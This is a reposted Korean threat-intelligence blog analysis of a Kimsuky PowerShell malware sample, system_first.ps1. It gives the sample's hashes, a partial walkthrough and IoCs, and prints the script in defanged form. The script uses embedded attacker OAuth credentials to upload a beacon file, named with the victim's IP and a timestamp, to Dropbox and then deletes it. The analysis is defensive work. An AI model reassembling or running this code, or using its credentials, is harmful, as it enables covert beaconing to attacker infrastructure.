lazarusholic

Everyday is lazarus.dayβ

북한 APT 김수키(Kimsuky)에서 만든 악성코드-system_first.ps1(2024.11.27)

2024-12-06, Sakai
https://wezard4u.tistory.com/429349
#Kimsuky

Contents

일단 해당 악성코드는 어제 작성한 글인 pay.bat에서 악성코드를 실행했을 때 드롭박스에서 연결된 파워셀 코드입니다.
일단 해쉬값은 다음과 같습니다.
파일명:system_first.ps1
사이즈:1,532 Bytes
MD5:e598db51ddee48b7c351b68aebf76ebf
SHA-1:60cdedb45513069a5d67310529966681bd0b4663
SHA-256:ed55bb081d0e4dfeefd7af35dbb0a0481be192d3d0759631c951f7d6d5737749
입니다.
[소프트웨어 팁/보안 및 분석] - APT 김수키(Kimsuky)에서 만든 악성코드-pay.bat(2024.11,27)
악성코드 PowerShell
$ttttttttttttt(t)ttttttttppppp(p)pppppppppppppp = $env:AppData;
$tokenRequestParams = @{
grant_type = "refresh_toke(n)"
refresh_token = "CxR76FAp2JAAAAA(A)AAAAAYc-Z6EEUm1sCkIn(Z)nCsHRQKCp5lOSKBMipCEudngc-l";
client_id = "8azq(s)rgxsd8fwrg"
client_secret = "jjaqv85b(m)knr7st"
}
$qwa = "hxxps://a" (+) "pi(.)dr" + "opboxa" (+) "pi(.)com/oau" + "th2(/)to" (+) "ken"
$myttto = Invoke-(R)estMethod -Uri ($)qwa -Method Post -Body $(t)okenRequestParams
$ipAddress = (Get-WmiObj(e)ct Win32_NetworkAda(p)terConfiguration | Where(-)Object { $_.IP(A)ddress -ne $null }).IPAddress[0]
$currentTi(m)e = Get-(D)ate -Format "MMdd_HHmm"
$fileName = "$ipAddress-$(c)urrentTime-XXX-santa2(.)txt"
$srcPath = Join-Path $tttttttttt(t)tttttttttttpppppppp(p)ppppppppppp $fileName
"xmil" | Out-File -Fi(l0ePath $srcPath
$outputFile = Split-Pa(t)h $srcPath -leaf
$tttttffffppp="/githut/sa(n)ta2_persist/$outputFile"
$arg = '{ "path": "' + $tttt(t)ffffppp + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $(($)myttto.access_token)
$headers = New-Object "System.Coll(e)ctions.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $auth(o)rization)
$headers.Add("D(r)opbox-API-Arg", $arg)
$headers.Add("Cont(e)nt-Type", 'applic(a)tion/octet-stream')
$diauyadsf = "djda(i)djaid"
$diaahah = "1818adjfi(a)sdjif"
$djaijd = 19029831(2)838123
$urrrr = "hxxps://content(.)drop"+"boxa"+"pi(.)com/2/f" (+) "iles/uplo" + "ad";
Invoke-RestMethod -Uri $urrrr -Method Post -InFile $srcPat(h) -Headers $headers
Remove-Item -Path $s(r)cPath;
코드 분석
1. 환경 변수 및 파일 경로 생성
$env:AppData:사용자의 AppData 경로를 가져오고 Windows 운영 체제에서 사용자별 데이터를 …

IoC

ed55bb081d0e4dfeefd7af35dbb0a0481be192d3d0759631c951f7d6d5737749
e598db51ddee48b7c351b68aebf76ebf
60cdedb45513069a5d67310529966681bd0b4663